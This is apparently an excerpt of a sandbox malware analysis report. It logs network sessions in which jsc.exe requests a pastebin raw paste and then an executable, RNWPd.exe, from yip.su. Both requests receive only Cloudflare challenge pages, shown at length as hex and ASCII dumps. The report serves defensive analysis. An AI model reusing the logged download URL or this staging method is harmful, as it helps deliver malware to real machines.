                                    Data Ascii: EuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zO
                                    2024-08-17 22:09:54 UTC1369INData Raw: 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a
                                    Data Ascii: 5rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:
                                    2024-08-17 22:09:54 UTC1369INData Raw: 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b
                                    Data Ascii: rast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl #challenge-error-text{background-position:100%;padding-left:0;
                                    2024-08-17 22:09:54 UTC1369INData Raw: 68 32 5a 73 4f 7a 50 34 71 6f 4f 42 74 57 35 4c 75 50 5f 6a 38 66 44 76 4d 55 47 64 7a 7a 69 6a 46 43 63 6d 53 53 2e 65 58 4b 34 68 33 4e 75 56 5f 39 44 4f 6f 73 65 62 61 58 70 4c 44 46 47 2e 51 4c 55 4d 4c 35 59 6b 32 59 4d 77 55 41 69 38 54 76 63 41 46 73 63 38 44 76 35 71 34 62 34 36 66 64 65 47 37 6d 79 46 38 43 32 59 36 4a 67 31 6b 43 31 75 77 36 67 51 51 52 47 53 78 5a 4f 52 4d 51 50 6e 73 45 6e 78 71 4c 31 6b 71 6e 6e 62 72 6b 49 47 50 79 57 32 56 4b 4e 41 59 48 77 68 4b 77 4d 49 4b 42 30 6b 52 79 69 6a 62 43 35 64 78 50 46 52 33 43 44 42 5a 61 43 47 4b 6e 49 38 48 71 54 36 30 36 6c 79 6a 35 54 48 31 49 67 6d 57 61 33 58 31 31 47 37 72 69 61 39 33 30 59 5f 54 73 4e 31 73 34 43 56 6e 49 4a 64 2e 7a 41 73 6c 78 59 7a 37 37 6b 71 47 78 4d 48 58 6a 66
                                    Data Ascii: h2ZsOzP4qoOBtW5LuP_j8fDvMUGdzzijFCcmSS.eXK4h3NuV_9DOosebaXpLDFG.QLUML5Yk2YMwUAi8TvcAFsc8Dv5q4b46fdeG7myF8C2Y6Jg1kC1uw6gQQRGSxZORMQPnsEnxqL1kqnnbrkIGPyW2VKNAYHwhKwMIKB0kRyijbC5dxPFR3CDBZaCGKnI8HqT606lyj5TH1IgmWa3X11G7ria930Y_TsN1s4CVnIJd.zAslxYz77kqGxMHXjf


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    38192.168.2.549764104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:00 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:00 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:10:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfde0581e8cdc-EWR
                                    2024-08-17 22:10:00 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:10:00 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:10:00 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:10:00 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:10:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    39192.168.2.549765188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:00 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:01 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:01 UTC679INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4f 46 4c 75 44 5a 39 41 41 79 70 66 55 4d 41 67 4f 7a 79 67 5a 54 2f 74 72 51 72 77 73 54 48 68 39 79 34 65 75 79 34 58 42 56 53 4c 51 2f 31 56 64 6b 63 47 36 65 42 30 43 72 67 31 54 51 65 2f 2f 70 73 47 66 6d 64 47 56 62 4f 30 55 34 4c 6a 64 67 41 72 2f 71 37 68 43 76 2b 61 6c 34 63 58 48 73 71 4f 2f 73 44 31 71 31 38 3d 24 6a 31 67 78 75 73 52 36 4a 49 68 37 34 77 6e 52 35 76 69 79 34 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: OFLuDZ9AAypfUMAgOzygZT/trQrwsTHh9y4euy4XBVSLQ/1VdkcG6eB0Crg1TQe//psGfmdGVbO0U4LjdgAr/q7hCv+al4cXHsqO/sD1q18=$j1gxusR6JIh74wnR5viy4g==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:10:01 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:01 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:01 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:01 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:01 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:01 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:01 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:10:01 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 32 32 33 37 33 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 64 65 34 33 64 62 32 63 33 34 36 27 2c 63 48 61 73 68 3a 20 27 64 34 32 34 64 62 38 38 34 64 38 66 33 64 37 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 57 47 70 71 38 74 78 72 33 4e 49 61 34 49 57 70 70 55 50 70 71 38 73 62 31 55 51 4e 43 35 55 50 59 50 36 59 59 6d 71 5a 45 70 41 2d 31 37 32 33 39 33 32 36 30 31 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '22373',cRay: '8b4cfde43db2c346',cHash: 'd424db884d8f3d7',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=WGpq8txr3NIa4IWppUPpq8sb1UQNC5UPYP6YYmqZEpA-1723932601-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:10:01 UTC1369INData Raw: 30 58 5f 47 6f 78 58 65 4d 49 4d 65 6c 5a 4a 50 33 61 4b 69 34 56 42 66 51 77 4e 64 6c 47 46 73 4a 62 68 76 52 72 46 53 44 61 6c 4e 6a 45 50 4c 37 48 35 4f 78 68 66 62 35 59 52 4f 53 4e 6d 56 4e 49 41 67 70 46 44 49 6e 4f 37 72 32 4b 30 65 69 4c 49 51 62 5f 6b 4e 72 62 73 44 74 78 5f 4e 72 4b 72 48 34 46 65 58 78 49 6d 32 77 4e 54 45 49 76 54 33 74 4e 49 39 41 52 5a 65 36 43 2e 6c 64 52 70 61 41 49 47 43 48 70 5a 52 6e 72 44 34 30 4d 51 6b 30 6b 43 57 70 6d 54 5a 6c 7a 6f 54 33 39 31 6a 53 36 78 59 77 2e 59 5f 36 41 75 69 46 68 38 55 4e 4e 74 53 56 6a 6e 30 6a 63 53 33 69 73 75 74 32 2e 30 43 6b 71 4f 50 64 58 6d 69 67 6f 6b 75 61 53 67 76 31 6a 44 33 63 77 4d 32 53 46 4f 30 39 77 41 57 4e 4b 5a 62 61 53 72 54 56 4b 56 76 45 6f 4f 50 4b 50 35 65 62 51 69
